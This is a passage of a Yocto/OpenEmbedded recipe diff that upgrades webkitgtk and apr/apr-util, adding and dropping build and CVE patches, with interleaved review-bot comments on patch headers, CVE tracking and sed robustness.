+- COMMAND glib-genmarshal --prefix=browser_marshal ${MINIBROWSER_DIR}/browser-marshal.list --header > ${DERIVED_SOURCES_MINIBROWSER_DIR}/BrowserMarshal.h
++ COMMAND glib-genmarshal --prefix=browser_marshal ${MINIBROWSER_DIR}/browser-marshal.list --body --skip-source > ${DERIVED_SOURCES_MINIBROWSER_DIR}/BrowserMarshal.c
++ COMMAND glib-genmarshal --prefix=browser_marshal ${MINIBROWSER_DIR}/browser-marshal.list --header --skip-source > ${DERIVED_SOURCES_MINIBROWSER_DIR}/BrowserMarshal.h
+ VERBATIM)
+
+ if (DEVELOPER_MODE)
+--
+2.31.1
+
diff --git a/meta/recipes-sato/webkit/webkitgtk/0001-clang-11-fix-build-errors-due-to-WWc-11-narrowing.patch b/meta/recipes-sato/webkit/webkitgtk/0001-clang-11-fix-build-errors-due-to-WWc-11-narrowing.patch
new file mode 100644
index 0000000000..d8bb8efb88
--- /dev/null
+++ b/meta/recipes-sato/webkit/webkitgtk/0001-clang-11-fix-build-errors-due-to-WWc-11-narrowing.patch
@@ -0,0 +1,66 @@
+From cb929f59b527fe890376e47613dfe1434a320bc0 Mon Sep 17 00:00:00 2001
+From: Khem Raj <raj.khem@gmail.com>
+Date: Tue, 11 Aug 2020 15:44:48 -0700
+Subject: [PATCH] [clang 11] fix build errors due to -WWc++11-narrowing
+
+https://bugs.webkit.org/show_bug.cgi?id=211193
+
+Reviewed by Adrian Perez de Castro.
+
+Fixes the following errors,
+
+Source/WebCore/html/MediaElementSession.cpp:1059:9: error: type 'WebCore::RenderMedia *' cannot be narrowed to 'bool' in initializer list [-Wc++11-narrowing]
+m_element.renderer(),
+^~~~~~~~~~~~~~~~~~~~
+
+Source/WebCore/style/StyleResolver.cpp:106:55: error: type 'const char [4]' cannot be narrowed to 'bool' in initializer list [-Wc++11-narrowing]
+m_mediaQueryEvaluator = MediaQueryEvaluator { "all" };
+ ^~~~~
+Source/WebCore/style/StyleResolver.cpp:106:55: note: insert an explicit cast to silence this issue
+m_mediaQueryEvaluator = MediaQueryEvaluator { "all" };
+ ^~~~~
+ static_cast<bool>( )
+
+* html/HTMLMediaElement.h:
+(WebCore::HTMLMediaElement::hasRenderer const):
+MediaElementSession was implicitly casting a pointer to a bool,
+which is not allowed with modern Clang checks. Add a helper method
+to encapsulate the now required static_cast<bool>.
+* html/MediaElementSession.cpp: Use the new helper method to see
+if the HTMLMediaElement has an associated renderer.
+(WebCore::MediaElementSession::updateMediaUsageIfChanged):
+* style/StyleResolver.cpp: This was calling MediaQueryEvaluator {
+"all" }; and seemingly expecting to cast a const char[] to a bool,
+or maybe String? It's confusing because of the MediaQueryEvaluator
+API. If it was implicitly converting to bool then that could be
+unintentional. Such casts are not allowed either now. The
+MediaQueryEvaluator's default constructor says it returns true for
+"all", which appears to be the original intent of this call, so I
+replaced it with that.
+(WebCore::Style::Resolver::Resolver):
+
+git-svn-id: http://svn.webkit.org/repository/webkit/trunk@260951 268f45cc-cd09-0410-ab3c-d52691b4dbfc
+
+Upstream-Status: Backport [https://github.com/WebKit/webkit/commit/c3cf651016e4cdcb4350598d4a586821071f91bf.patch]
+
+Signed-off-by: Khem Raj <raj.khem@gmail.com>
+---
+ Source/WebCore/style/StyleResolver.cpp | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/Source/WebCore/style/StyleResolver.cpp b/Source/WebCore/style/StyleResolver.cpp
+index 8bf371a0..34580ddb 100644
+--- a/Source/WebCore/style/StyleResolver.cpp
++++ b/Source/WebCore/style/StyleResolver.cpp
+@@ -107,7 +107,7 @@ Resolver::Resolver(Document& document)
+ if (view)
+ m_mediaQueryEvaluator = MediaQueryEvaluator { view->mediaType() };
+ else
+- m_mediaQueryEvaluator = MediaQueryEvaluator { "all" };
++ m_mediaQueryEvaluator = MediaQueryEvaluator { };
+
+ if (root) {
+ m_rootDefaultStyle = styleForElement(*root, m_document.renderStyle(), nullptr, RuleMatchingBehavior::MatchOnlyUserAgentRules).renderStyle;
+--
+2.28.0
+
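Review bot: The patch header describes changes to `html/HTMLMediaElement.h` and `html/MediaElementSession.cpp`, but the diffstat and the only hunk touch `Source/WebCore/style/StyleResolver.cpp`, so the header no longer matches what is applied. If the other parts were dropped because this version does not need them, say so below `Upstream-Status`, for example `Only the StyleResolver.cpp part is carried; the MediaElementSession change is not needed for this version`. Otherwise the first quoted error, at `MediaElementSession.cpp:1059`, would presumably still occur with clang 11.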
diff --git a/meta/recipes-sato/webkit/webkitgtk/CVE-2020-13753.patch b/meta/recipes-sato/webkit/webkitgtk/CVE-2020-13753.patch
deleted file mode 100644
index d8504c2b36..0000000000
--- a/meta/recipes-sato/webkit/webkitgtk/CVE-2020-13753.patch
+++ /dev/null
@@ -1,15 +0,0 @@
-Upstream-Status: Backport [https://trac.webkit.org/changeset/262368/webkit?format=diff&new=262368]
-CVE: CVE-2020-13753
-Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
-
-Index: a/Source/WebKit/UIProcess/Launcher/glib/BubblewrapLauncher.cpp
-===================================================================
---- a/Source/WebKit/UIProcess/Launcher/glib/BubblewrapLauncher.cpp (revision 262367)
-+++ b/Source/WebKit/UIProcess/Launcher/glib/BubblewrapLauncher.cpp (revision 262368)
-@@ -642,5 +642,5 @@
- int r;
- if (rule.arg)
-- r = seccomp_rule_add(seccomp, SCMP_ACT_ERRNO(EPERM), scall, 1, rule.arg);
-+ r = seccomp_rule_add(seccomp, SCMP_ACT_ERRNO(EPERM), scall, 1, *rule.arg);
- else
- r = seccomp_rule_add(seccomp, SCMP_ACT_ERRNO(EPERM), scall, 0);
diff --git a/meta/recipes-sato/webkit/webkitgtk_2.28.2.bb b/meta/recipes-sato/webkit/webkitgtk_2.28.4.bb
index 9cfec83ec7..2e3f0aa682 100644
--- a/meta/recipes-sato/webkit/webkitgtk_2.28.2.bb
+++ b/meta/recipes-sato/webkit/webkitgtk_2.28.4.bb
@@ -19,10 +19,10 @@ SRC_URI = "https://www.webkitgtk.org/releases/${BPN}-${PV}.tar.xz \
file://cross-compile.patch \
file://0001-Fix-build-with-musl.patch \
file://include_array.patch \
- file://CVE-2020-13753.patch \
+ file://0001-clang-11-fix-build-errors-due-to-WWc-11-narrowing.patch \
+ file://0001-MiniBrowser-Fix-reproduciblity.patch \
"
-SRC_URI[md5sum] = "ec0ef870ca37e3a5ebbead2f268a28ec"
-SRC_URI[sha256sum] = "b9d23525cfd8d22c37b5d964a9fe9a8ce7583042a2f8d3922e71e6bbc68c30bd"
+SRC_URI[sha256sum] = "821952e8c9303ed752f1fb1d4283f612c25249d00d705d2b79c2db1bc49c9464"
inherit cmake pkgconfig gobject-introspection perlnative features_check upstream-version-is-even gtk-doc
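Review bot: Dropping `file://CVE-2020-13753.patch` from `SRC_URI` also removes the `CVE:` tag that recorded the issue as patched, and nothing in this hunk states that the 2.28.4 tarball carries the fix. The deleted patch changed the seccomp rule in `BubblewrapLauncher.cpp` to pass `*rule.arg`, so it is worth confirming that line in the new source and recording it in the commit message, e.g. `CVE-2020-13753.patch dropped: fix is included in the new upstream release`. With the patch gone, CVE scanning for this recipe depends only on the recipe version falling outside the affected range.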
@@ -131,3 +131,15 @@ GI_DATA_ENABLED_libc-musl_armv7ve = "False"
# Can't be built with ccache
CCACHE_DISABLE = "1"
+
+PACKAGE_PREPROCESS_FUNCS += "src_package_preprocess"
+src_package_preprocess () {
+ # Trim build paths from comments in generated sources to ensure reproducibility
+ sed -i -e "s,${WORKDIR},,g" \
+ ${B}/DerivedSources/webkit2gtk/webkit2/*.cpp \
+ ${B}/DerivedSources/ForwardingHeaders/JavaScriptCore/*.h \
+ ${B}/DerivedSources/JavaScriptCore/*.h \
+ ${B}/DerivedSources/JavaScriptCore/yarr/*.h \
+ ${B}/DerivedSources/MiniBrowser/*.c
+}
+
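Review bot: `src_package_preprocess` passes five fixed glob patterns to a single `sed -i`, so if any of them matches nothing in a given configuration the literal pattern reaches sed and the call fails, which would likely fail the packaging step. Letting `find` select the files avoids that: `find ${B}/DerivedSources -type f \( -name '*.cpp' -o -name '*.h' -o -name '*.c' \) -exec sed -i -e "s,${WORKDIR},,g" {} +`. Note that this widens the scope to every generated source under `DerivedSources`. `${WORKDIR}` is also used as a regular expression with `,` as the delimiter, so a comment stating that the path is assumed to contain no commas would help.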
diff --git a/meta/recipes-sato/webkit/wpebackend-fdo_1.4.1.bb b/meta/recipes-sato/webkit/wpebackend-fdo_1.4.1.bb
index cd2f7fabda..165fc74dde 100644
--- a/meta/recipes-sato/webkit/wpebackend-fdo_1.4.1.bb
+++ b/meta/recipes-sato/webkit/wpebackend-fdo_1.4.1.bb
@@ -15,3 +15,6 @@ REQUIRED_DISTRO_FEATURES = "opengl"
SRC_URI = "https://wpewebkit.org/releases/${BPN}-${PV}.tar.xz"
SRC_URI[sha256sum] = "6249a0b7cbfa662206a8d2fa24e2c574e75c681ad0e93468091f1dc68ddb299d"
+FILES_${PN} += "${libdir}/libWPEBackend-fdo-1.0.so"
+FILES_SOLIBSDEV = ""
+INSANE_SKIP_${PN} += "dev-so"
diff --git a/meta/recipes-support/apr/apr-util/0001-Fix-error-handling-in-gdbm.patch b/meta/recipes-support/apr/apr-util/0001-Fix-error-handling-in-gdbm.patch
deleted file mode 100644
index 57e7453312..0000000000
--- a/meta/recipes-support/apr/apr-util/0001-Fix-error-handling-in-gdbm.patch
+++ /dev/null
@@ -1,135 +0,0 @@
-From 6b638fa9afbeb54dfa19378e391465a5284ce1ad Mon Sep 17 00:00:00 2001
-From: Changqing Li <changqing.li@windriver.com>
-Date: Wed, 12 Sep 2018 17:16:36 +0800
-Subject: [PATCH] Fix error handling in gdbm
-
-Only check for gdbm_errno if the return value of the called gdbm_*
-function says so. This fixes apr-util with gdbm 1.14, which does not
-seem to always reset gdbm_errno.
-
-Also make the gdbm driver return error codes starting with
-APR_OS_START_USEERR instead of always returning APR_EGENERAL. This is
-what the berkleydb driver already does.
-
-Also ensure that dsize is 0 if dptr == NULL.
-
-Upstream-Status: Backport[https://svn.apache.org/viewvc?
-view=revision&amp;revision=1825311]
-
-Signed-off-by: Changqing Li <changqing.li@windriver.com>
----
- dbm/apr_dbm_gdbm.c | 47 +++++++++++++++++++++++++++++------------------
- 1 file changed, 29 insertions(+), 18 deletions(-)
-
-diff --git a/dbm/apr_dbm_gdbm.c b/dbm/apr_dbm_gdbm.c
-index 749447a..1c86327 100644
---- a/dbm/apr_dbm_gdbm.c
-+++ b/dbm/apr_dbm_gdbm.c
-@@ -36,13 +36,25 @@
- static apr_status_t g2s(int gerr)
- {
- if (gerr == -1) {
-- /* ### need to fix this */
-- return APR_EGENERAL;
-+ if (gdbm_errno == GDBM_NO_ERROR)
-+ return APR_SUCCESS;
-+ return APR_OS_START_USEERR + gdbm_errno;
- }
-
- return APR_SUCCESS;
- }
-
-+static apr_status_t gdat2s(datum d)
-+{
-+ if (d.dptr == NULL) {
-+ if (gdbm_errno == GDBM_NO_ERROR || gdbm_errno == GDBM_ITEM_NOT_FOUND)
-+ return APR_SUCCESS;
-+ return APR_OS_START_USEERR + gdbm_errno;
-+ }
-+
-+ return APR_SUCCESS;
-+}
-+
- static apr_status_t datum_cleanup(void *dptr)
- {
- if (dptr)
-@@ -53,22 +65,15 @@ static apr_status_t datum_cleanup(void *dptr)
-
- static apr_status_t set_error(apr_dbm_t *dbm, apr_status_t dbm_said)
- {
-- apr_status_t rv = APR_SUCCESS;
-
-- /* ### ignore whatever the DBM said (dbm_said); ask it explicitly */
-+ dbm->errcode = dbm_said;
-
-- if ((dbm->errcode = gdbm_errno) == GDBM_NO_ERROR) {
-+ if (dbm_said == APR_SUCCESS)
- dbm->errmsg = NULL;
-- }
-- else {
-- dbm->errmsg = gdbm_strerror(gdbm_errno);
-- rv = APR_EGENERAL; /* ### need something better */
-- }
--
-- /* captured it. clear it now. */
-- gdbm_errno = GDBM_NO_ERROR;
-+ else
-+ dbm->errmsg = gdbm_strerror(dbm_said - APR_OS_START_USEERR);
-
-- return rv;
-+ return dbm_said;
- }
-
- /* --------------------------------------------------------------------------
-@@ -107,7 +112,7 @@ static apr_status_t vt_gdbm_open(apr_dbm_t **pdb, const char *pathname,
- NULL);
-
- if (file == NULL)
-- return APR_EGENERAL; /* ### need a better error */
-+ return APR_OS_START_USEERR + gdbm_errno; /* ### need a better error */
-
- /* we have an open database... return it */
- *pdb = apr_pcalloc(pool, sizeof(**pdb));
-@@ -141,10 +146,12 @@ static apr_status_t vt_gdbm_fetch(apr_dbm_t *dbm, apr_datum_t key,
- if (pvalue->dptr)
- apr_pool_cleanup_register(dbm->pool, pvalue->dptr, datum_cleanup,
- apr_pool_cleanup_null);
-+ else
-+ pvalue->dsize = 0;
-
- /* store the error info into DBM, and return a status code. Also, note
- that *pvalue should have been cleared on error. */
-- return set_error(dbm, APR_SUCCESS);
-+ return set_error(dbm, gdat2s(rd));
- }
-
- static apr_status_t vt_gdbm_store(apr_dbm_t *dbm, apr_datum_t key,
-@@ -201,9 +208,11 @@ static apr_status_t vt_gdbm_firstkey(apr_dbm_t *dbm, apr_datum_t *pkey)
- if (pkey->dptr)
- apr_pool_cleanup_register(dbm->pool, pkey->dptr, datum_cleanup,
- apr_pool_cleanup_null);
-+ else
-+ pkey->dsize = 0;
-
- /* store any error info into DBM, and return a status code. */
-- return set_error(dbm, APR_SUCCESS);
-+ return set_error(dbm, gdat2s(rd));
- }
-
- static apr_status_t vt_gdbm_nextkey(apr_dbm_t *dbm, apr_datum_t *pkey)
-@@ -221,9 +230,11 @@ static apr_status_t vt_gdbm_nextkey(apr_dbm_t *dbm, apr_datum_t *pkey)
- if (pkey->dptr)
- apr_pool_cleanup_register(dbm->pool, pkey->dptr, datum_cleanup,
- apr_pool_cleanup_null);
-+ else
-+ pkey->dsize = 0;
-
- /* store any error info into DBM, and return a status code. */
-- return set_error(dbm, APR_SUCCESS);
-+ return set_error(dbm, gdat2s(rd));
- }
-
- static void vt_gdbm_freedatum(apr_dbm_t *dbm, apr_datum_t data)
---
-2.7.4
-
diff --git a/meta/recipes-support/apr/apr-util_1.6.1.bb b/meta/recipes-support/apr/apr-util_1.6.3.bb
index 0dd8f025e8..3d9d619c7b 100644
--- a/meta/recipes-support/apr/apr-util_1.6.1.bb
+++ b/meta/recipes-support/apr/apr-util_1.6.3.bb
@@ -13,16 +13,13 @@ SRC_URI = "${APACHE_MIRROR}/apr/${BPN}-${PV}.tar.gz \
file://configfix.patch \
file://configure_fixes.patch \
file://run-ptest \
- file://0001-Fix-error-handling-in-gdbm.patch \
-"
+ "
-SRC_URI[md5sum] = "bd502b9a8670a8012c4d90c31a84955f"
-SRC_URI[sha256sum] = "b65e40713da57d004123b6319828be7f1273fbc6490e145874ee1177e112c459"
+SRC_URI[sha256sum] = "2b74d8932703826862ca305b094eef2983c27b39d5c9414442e9976a9acf1983"
-EXTRA_OECONF = "--with-apr=${STAGING_BINDIR_CROSS}/apr-1-config \
+EXTRA_OECONF = "--with-apr=${STAGING_BINDIR_CROSS}/apr-1-config \
--without-odbc \
--without-pgsql \
- --with-dbm=gdbm \
--without-sqlite2 \
--with-expat=${STAGING_DIR_HOST}${prefix}"
@@ -36,6 +33,7 @@ OE_BINCONFIG_EXTRA_MANGLE = " -e 's:location=source:location=installed:'"
do_configure_append() {
if [ "${CLASSOVERRIDE}" = "class-target" ]; then
cp ${STAGING_DATADIR}/apr/apr_rules.mk ${B}/build/rules.mk
+ sed -i -e 's#^CFLAGS=.*#CFLAGS=${TARGET_CFLAGS}#g' ${B}/build/rules.mk
fi
}
do_configure_prepend_class-native() {
@@ -50,6 +48,7 @@ do_configure_append_class-native() {
do_configure_prepend_class-nativesdk() {
cp ${STAGING_DATADIR}/apr/apr_rules.mk ${S}/build/rules.mk
+ sed -i -e 's#^CFLAGS=.*#CFLAGS=${TARGET_CFLAGS}#g' ${S}/build/rules.mk
}
do_configure_append_class-nativesdk() {
@@ -69,7 +68,7 @@ PACKAGECONFIG ??= "crypto gdbm"
PACKAGECONFIG[ldap] = "--with-ldap,--without-ldap,openldap"
PACKAGECONFIG[crypto] = "--with-openssl=${STAGING_DIR_HOST}${prefix} --with-crypto,--without-crypto,openssl"
PACKAGECONFIG[sqlite3] = "--with-sqlite3=${STAGING_DIR_HOST}${prefix},--without-sqlite3,sqlite3"
-PACKAGECONFIG[gdbm] = "--with-gdbm=${STAGING_DIR_HOST}${prefix},--without-gdbm,gdbm"
+PACKAGECONFIG[gdbm] = "--with-dbm=gdbm --with-gdbm=${STAGING_DIR_HOST}${prefix},--without-gdbm,gdbm"
#files ${libdir}/apr-util-1/*.so are not symlinks but loadable modules thus they are packaged in ${PN}
FILES_${PN} += "${libdir}/apr-util-1/apr*${SOLIBS} ${libdir}/apr-util-1/apr*${SOLIBSDEV}"
diff --git a/meta/recipes-support/apr/apr/0001-Add-option-to-disable-timed-dependant-tests.patch b/meta/recipes-support/apr/apr/0001-Add-option-to-disable-timed-dependant-tests.patch
index abff4e9331..a274f3a16e 100644
--- a/meta/recipes-support/apr/apr/0001-Add-option-to-disable-timed-dependant-tests.patch
+++ b/meta/recipes-support/apr/apr/0001-Add-option-to-disable-timed-dependant-tests.patch
@@ -1,14 +1,15 @@
-From 2bbe20b4f69e84e7a18bc79d382486953f479328 Mon Sep 17 00:00:00 2001
+From 225abf37cd0b49960664b59f08e515a4c4ea5ad0 Mon Sep 17 00:00:00 2001
From: Jeremy Puhlman <jpuhlman@mvista.com>
Date: Thu, 26 Mar 2020 18:30:36 +0000
Subject: [PATCH] Add option to disable timed dependant tests
-The disabled tests rely on timing to pass correctly. On a virtualized
+The disabled tests rely on timing to pass correctly. On a virtualized
system under heavy load, these tests randomly fail because they miss
a timer or other timing related issues.
Upstream-Status: Pending
Signed-off-by: Jeremy Puhlman <jpuhlman@mvista.com>
+
---
configure.in | 6 ++++++
include/apr.h.in | 1 +
@@ -16,10 +17,10 @@ Signed-off-by: Jeremy Puhlman <jpuhlman@mvista.com>
3 files changed, 9 insertions(+), 2 deletions(-)
diff --git a/configure.in b/configure.in
-index d9f32d6..f0c5661 100644
+index bfd488b..3663220 100644
--- a/configure.in
+++ b/configure.in
-@@ -2886,6 +2886,12 @@ AC_ARG_ENABLE(timedlocks,
+@@ -3023,6 +3023,12 @@ AC_ARG_ENABLE(timedlocks,
)
AC_SUBST(apr_has_timedlocks)
@@ -45,10 +46,10 @@ index ee99def..c46a5f4 100644
#define APR_PROCATTR_USER_SET_REQUIRES_PASSWORD @apr_procattr_user_set_requires_password@
diff --git a/test/testlock.c b/test/testlock.c
-index a43f477..6233d0b 100644
+index e3437c1..04e01b9 100644
--- a/test/testlock.c
+++ b/test/testlock.c
-@@ -396,13 +396,13 @@ abts_suite *testlock(abts_suite *suite)
+@@ -535,7 +535,7 @@ abts_suite *testlock(abts_suite *suite)
abts_run_test(suite, threads_not_impl, NULL);
#else
abts_run_test(suite, test_thread_mutex, NULL);
@@ -56,6 +57,8 @@ index a43f477..6233d0b 100644
+#if APR_HAS_TIMEDLOCKS && APR_HAVE_TIME_DEPENDANT_TESTS
abts_run_test(suite, test_thread_timedmutex, NULL);
#endif
+ abts_run_test(suite, test_thread_nestedmutex, NULL);
+@@ -543,7 +543,7 @@ abts_suite *testlock(abts_suite *suite)
abts_run_test(suite, test_thread_rwlock, NULL);
abts_run_test(suite, test_cond, NULL);
abts_run_test(suite, test_timeoutcond, NULL);
@@ -63,7 +66,4 @@ index a43f477..6233d0b 100644
+#if APR_HAS_TIMEDLOCKS && APR_HAVE_TIME_DEPENDANT_TESTS
abts_run_test(suite, test_timeoutmutex, NULL);
#endif
- #endif
---
-2.23.0
-
+ #ifdef WIN32
diff --git a/meta/recipes-support/apr/apr/0001-configure-Remove-runtime-test-for-mmap-that-can-map-.patch b/meta/recipes-support/apr/apr/0001-configure-Remove-runtime-test-for-mmap-that-can-map-.patch
new file mode 100644
index 0000000000..a78b16284f
--- /dev/null
+++ b/meta/recipes-support/apr/apr/0001-configure-Remove-runtime-test-for-mmap-that-can-map-.patch
@@ -0,0 +1,58 @@
+From 316b81c462f065927d7fec56aadd5c8cb94d1cf0 Mon Sep 17 00:00:00 2001
+From: Khem Raj <raj.khem@gmail.com>
+Date: Fri, 26 Aug 2022 00:28:08 -0700
+Subject: [PATCH] configure: Remove runtime test for mmap that can map
+ /dev/zero
+
+This never works for cross-compile moreover it ends up disabling
+ac_cv_file__dev_zero which then results in compiler errors in shared
+mutexes
+
+Upstream-Status: Inappropriate [Cross-compile specific]
+Signed-off-by: Khem Raj <raj.khem@gmail.com>
+
+---
+ configure.in | 30 ------------------------------
+ 1 file changed, 30 deletions(-)
+
+diff --git a/configure.in b/configure.in
+index 3663220..dce9789 100644
+--- a/configure.in
++++ b/configure.in
+@@ -1303,36 +1303,6 @@ AC_CHECK_FUNCS([mmap munmap shm_open shm_unlink shmget shmat shmdt shmctl \
+ APR_CHECK_DEFINE(MAP_ANON, sys/mman.h)
+ AC_CHECK_FILE(/dev/zero)
+
+-# Not all systems can mmap /dev/zero (such as HP-UX). Check for that.
+-if test "$ac_cv_func_mmap" = "yes" &&
+- test "$ac_cv_file__dev_zero" = "yes"; then
+- AC_CACHE_CHECK([for mmap that can map /dev/zero],
+- [ac_cv_mmap__dev_zero],
+- [AC_TRY_RUN([#include <sys/types.h>
+-#include <sys/stat.h>
+-#include <fcntl.h>
+-#ifdef HAVE_SYS_MMAN_H
+-#include <sys/mman.h>
+-#endif
+- int main()
+- {
+- int fd;
+- void *m;
+- fd = open("/dev/zero", O_RDWR);
+- if (fd < 0) {
+- return 1;
+- }
+- m = mmap(0, sizeof(void*), PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);
+- if (m == (void *)-1) { /* aka MAP_FAILED */
+- return 2;
+- }
+- if (munmap(m, sizeof(void*)) < 0) {
+- return 3;
+- }
+- return 0;
+- }], [], [ac_cv_file__dev_zero=no], [ac_cv_file__dev_zero=no])])
+-fi
+-
+ # Now we determine which one is our anonymous shmem preference.
+ haveshmgetanon="0"
+ havemmapzero="0"
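Review bot: The recipe may not need to carry this patch, because the deleted probe sits inside `AC_CACHE_CHECK([for mmap that can map /dev/zero], [ac_cv_mmap__dev_zero], ...)`, and a preset cache variable should skip the `AC_TRY_RUN` body that resets `ac_cv_file__dev_zero` to `no`. Adding `CACHED_CONFIGUREVARS += "ac_cv_mmap__dev_zero=yes"` next to the existing `ac_cv_file__dev_zero=yes` would leave upstream `configure.in` untouched and remove one `Inappropriate` patch to rebase on each upgrade. As written, the probe is also removed for the `native` and `nativesdk` variants, where it could have run. If the patch stays, its commit message should say that the recipe forces `ac_cv_file__dev_zero=yes`, so the assumption that the target can map `/dev/zero` is recorded.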
diff --git a/meta/recipes-support/apr/apr/0002-apr-Remove-workdir-path-references-from-installed-ap.patch b/meta/recipes-support/apr/apr/0002-apr-Remove-workdir-path-references-from-installed-ap.patch
index 72e706f966..d63423f3a1 100644
--- a/meta/recipes-support/apr/apr/0002-apr-Remove-workdir-path-references-from-installed-ap.patch
+++ b/meta/recipes-support/apr/apr/0002-apr-Remove-workdir-path-references-from-installed-ap.patch
@@ -1,8 +1,7 @@
-From 5925b20da8bbc34d9bf5a5dca123ef38864d43c6 Mon Sep 17 00:00:00 2001
+From 689a8db96a6d1e1cae9cbfb35d05ac82140a6555 Mon Sep 17 00:00:00 2001
From: Hongxu Jia <hongxu.jia@windriver.com>
Date: Tue, 30 Jan 2018 09:39:06 +0800
-Subject: [PATCH 2/7] apr: Remove workdir path references from installed apr
- files
+Subject: [PATCH] apr: Remove workdir path references from installed apr files
Upstream-Status: Inappropriate [configuration]
@@ -14,20 +13,23 @@ packages at target run time, the workdir path caused confusion.
Rebase to 1.6.3
Signed-off-by: Hongxu Jia <hongxu.jia@windriver.com>
+
---
- apr-config.in | 26 ++------------------------
- 1 file changed, 2 insertions(+), 24 deletions(-)
+ apr-config.in | 32 ++------------------------------
+ 1 file changed, 2 insertions(+), 30 deletions(-)
diff --git a/apr-config.in b/apr-config.in
-index 84b4073..bbbf651 100644
+index bed47ca..47874e5 100644
--- a/apr-config.in
+++ b/apr-config.in
-@@ -152,14 +152,7 @@ while test $# -gt 0; do
+@@ -164,16 +164,7 @@ while test $# -gt 0; do
flags="$flags $LDFLAGS"
;;
--includes)
- if test "$location" = "installed"; then
flags="$flags -I$includedir $EXTRA_INCLUDES"
+- elif test "$location" = "crosscompile"; then
+- flags="$flags -I$APR_TARGET_DIR/$includedir $EXTRA_INCLUDES"
- elif test "$location" = "source"; then
- flags="$flags -I$APR_SOURCE_DIR/include $EXTRA_INCLUDES"
- else
@@ -37,13 +39,15 @@ index 84b4073..bbbf651 100644
;;
--srcdir)
echo $APR_SOURCE_DIR
-@@ -181,29 +174,14 @@ while test $# -gt 0; do
+@@ -197,33 +188,14 @@ while test $# -gt 0; do
exit 0
;;
--link-ld)
- if test "$location" = "installed"; then
- ### avoid using -L if libdir is a "standard" location like /usr/lib
- flags="$flags -L$libdir -l${APR_LIBNAME}"
+- elif test "$location" = "crosscompile"; then
+- flags="$flags -L$APR_TARGET_DIR/$libdir -l${APR_LIBNAME}"
- else
- ### this surely can't work since the library is in .libs?
- flags="$flags -L$APR_BUILD_DIR -l${APR_LIBNAME}"
@@ -62,6 +66,8 @@ index 84b4073..bbbf651 100644
- # Since the user is specifying they are linking with libtool, we
- # *know* that -R will be recognized by libtool.
- flags="$flags -L$libdir -R$libdir -l${APR_LIBNAME}"
+- elif test "$location" = "crosscompile"; then
+- flags="$flags -L${APR_TARGET_DIR}/$libdir -l${APR_LIBNAME}"
- else
- flags="$flags $LA_FILE"
- fi
@@ -69,6 +75,3 @@ index 84b4073..bbbf651 100644
;;
--shlib-path-var)
echo "$SHLIBPATH_VAR"
---
-1.8.3.1
-
diff --git a/meta/recipes-support/apr/apr/0003-Makefile.in-configure.in-support-cross-compiling.patch b/meta/recipes-support/apr/apr/0003-Makefile.in-configure.in-support-cross-compiling.patch
deleted file mode 100644
index 4dd53bd8eb..0000000000
--- a/meta/recipes-support/apr/apr/0003-Makefile.in-configure.in-support-cross-compiling.patch
+++ /dev/null
@@ -1,63 +0,0 @@
-From d5028c10f156c224475b340cfb1ba025d6797243 Mon Sep 17 00:00:00 2001
-From: Hongxu Jia <hongxu.jia@windriver.com>
-Date: Fri, 2 Feb 2018 15:51:42 +0800
-Subject: [PATCH 3/7] Makefile.in/configure.in: support cross compiling
-
-While cross compiling, the tools/gen_test_char could not
-be executed at build time, use AX_PROG_CC_FOR_BUILD to
-build native tools/gen_test_char
-
-Upstream-Status: Submitted [https://github.com/apache/apr/pull/8]
-
-Signed-off-by: Hongxu Jia <hongxu.jia@windriver.com>
----
- Makefile.in | 10 +++-------
- configure.in | 3 +++
- 2 files changed, 6 insertions(+), 7 deletions(-)
-
-diff --git a/Makefile.in b/Makefile.in
-index 5fb760e..8675f90 100644
---- a/Makefile.in
-+++ b/Makefile.in
-@@ -46,7 +46,7 @@ LT_VERSION = @LT_VERSION@
-
- CLEAN_TARGETS = apr-config.out apr.exp exports.c export_vars.c .make.dirs \
- build/apr_rules.out tools/gen_test_char@EXEEXT@ \
-- tools/gen_test_char.o tools/gen_test_char.lo \
-+ tools/gen_test_char.o \
- include/private/apr_escape_test_char.h
- DISTCLEAN_TARGETS = config.cache config.log config.status \
- include/apr.h include/arch/unix/apr_private.h \
-@@ -131,13 +131,9 @@ check: $(TARGET_LIB)
- etags:
- etags `find . -name '*.[ch]'`
-
--OBJECTS_gen_test_char = tools/gen_test_char.lo $(LOCAL_LIBS)
--tools/gen_test_char.lo: tools/gen_test_char.c
-+tools/gen_test_char@EXEEXT@: tools/gen_test_char.c
- $(APR_MKDIR) tools
-- $(LT_COMPILE)
--
--tools/gen_test_char@EXEEXT@: $(OBJECTS_gen_test_char)
-- $(LINK_PROG) $(OBJECTS_gen_test_char) $(ALL_LIBS)
-+ $(CC_FOR_BUILD) $(CFLAGS_FOR_BUILD) $< -o $@
-
- include/private/apr_escape_test_char.h: tools/gen_test_char@EXEEXT@
- $(APR_MKDIR) include/private
-diff --git a/configure.in b/configure.in
-index 719f331..361120f 100644
---- a/configure.in
-+++ b/configure.in
-@@ -183,6 +183,9 @@ dnl can only be used once within a configure script, so this prevents a
- dnl preload section from invoking the macro to get compiler info.
- AC_PROG_CC
-
-+dnl Check build CC for gen_test_char compiling which is executed at build time.
-+AX_PROG_CC_FOR_BUILD
-+
- dnl AC_PROG_SED is only avaliable in recent autoconf versions.
- dnl Use AC_CHECK_PROG instead if AC_PROG_SED is not present.
- ifdef([AC_PROG_SED],
---
-1.8.3.1
-
diff --git a/meta/recipes-support/apr/apr/0006-apr-fix-off_t-size-doesn-t-match-in-glibc-when-cross.patch b/meta/recipes-support/apr/apr/0006-apr-fix-off_t-size-doesn-t-match-in-glibc-when-cross.patch
deleted file mode 100644
index d1a2ebe881..0000000000
--- a/meta/recipes-support/apr/apr/0006-apr-fix-off_t-size-doesn-t-match-in-glibc-when-cross.patch
+++ /dev/null
@@ -1,76 +0,0 @@
-From 49661ea3858cf8494926cccf57d3e8c6dcb47117 Mon Sep 17 00:00:00 2001
-From: Dengke Du <dengke.du@windriver.com>
-Date: Wed, 14 Dec 2016 18:13:08 +0800
-Subject: [PATCH] apr: fix off_t size doesn't match in glibc when cross
- compiling
-
-In configure.in, it contains the following:
-
- APR_CHECK_SIZEOF_EXTENDED([#include <sys/types.h>], off_t, 8)
-
-the macro "APR_CHECK_SIZEOF_EXTENDED" was defined in build/apr_common.m4,
-it use the "AC_TRY_RUN" macro, this macro let the off_t to 8, when cross
-compiling enable.
-
-So it was hardcoded for cross compiling, we should detect it dynamic based on
-the sysroot's glibc. We change it to the following:
-
